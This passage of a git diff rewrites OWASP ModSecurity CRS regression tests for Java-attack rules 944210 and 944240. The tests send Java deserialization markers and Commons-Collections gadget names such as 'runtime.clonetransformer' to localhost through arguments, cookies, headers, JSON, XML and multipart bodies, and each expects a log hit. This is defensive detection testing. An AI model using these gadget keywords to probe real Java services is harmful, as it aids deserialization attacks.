application/json\r\n\r\n{\"KztAAU\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-32 - desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nKztAAU\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-33 - desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nKztAAU\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - test_title: 944210-34 - desc: "Argument test includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: 
- Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Cs7QAF" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-35 - desc: "Argument name includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Cs7QAF=test" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-36 - desc: "Cookie test includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Cs7QAF - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-37 - desc: "Cookie name includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Cs7QAF=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-38 - desc: "Request header test includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Cs7QAF - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-39 - desc: "XML element includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - - - test_title: 944210-40 - desc: "XML attribute name includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - - - test_title: 944210-41 - desc: "XML attribute value includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-42 - desc: "XML element value includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Cs7QAF" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-43 - desc: "Nested XML element value includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Cs7QAF" - output: - log_contains: "id \"944210\"" - - - - 
test_title: 944210-44 - desc: "Content-Type text/plain includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Cs7QAF" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-45 - desc: "Content-Type application/json arg value includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Cs7QAF\"}" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-46 - desc: "Content-Type application/json arg name includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Cs7QAF\": \"test\"}" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-47 - desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: 
"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"Cs7QAF\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-48 - desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"Cs7QAF\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-49 - desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nCs7QAF\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" - - - - test_title: 944210-50 - desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nCs7QAF\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944210\"" + Cs7QAF + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml index 0a5b47bf16..694069972b 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml 
@@ -1,2047 +1,1703 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944240.yaml" - description: "Positive tests for rule 944240" - tests: - - - test_title: 944240-0 - desc: "Argument test includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-1 - desc: "Argument name includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "runtime.clonetransformer=test" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-2 - desc: "Cookie test includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.clonetransformer - method: 
"POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-3 - desc: "Cookie name includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.clonetransformer=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-4 - desc: "Request header test includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.clonetransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-5 - desc: "XML attribute value includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - 
log_contains: "id \"944240\"" - - - - test_title: 944240-6 - desc: "XML element value includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-7 - desc: "Nested XML element value includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-8 - desc: "Content-Type text/plain includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-9 - desc: "Content-Type application/json arg value includes 
keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.clonetransformer\"}" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-10 - desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"runtime.clonetransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - - test_title: 944240-11 - desc: "Argument test includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.forclosure" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-12 - desc: "Argument name includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: 
"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "runtime.forclosure=test" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-13 - desc: "Cookie test includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.forclosure - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-14 - desc: "Cookie name includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.forclosure=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-15 - desc: "Request header test includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: 
"ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.forclosure - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-16 - desc: "XML attribute value includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-17 - desc: "XML element value includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.forclosure" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-18 - desc: "Nested XML element value includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.forclosure" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-19 - desc: "Content-Type text/plain includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.forclosure" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-20 - desc: "Content-Type application/json arg value includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.forclosure\"}" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-21 - desc: "Content-Type application/json arg name includes keyword runtime.forclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"runtime.forclosure\": \"test\"}" - output: - log_contains: "id \"944240\"" - - - test_title: 944240-22 - desc: "Argument test includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-23 - desc: "Argument name includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "runtime.instantiatefactory=test" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-24 - desc: "Cookie test includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 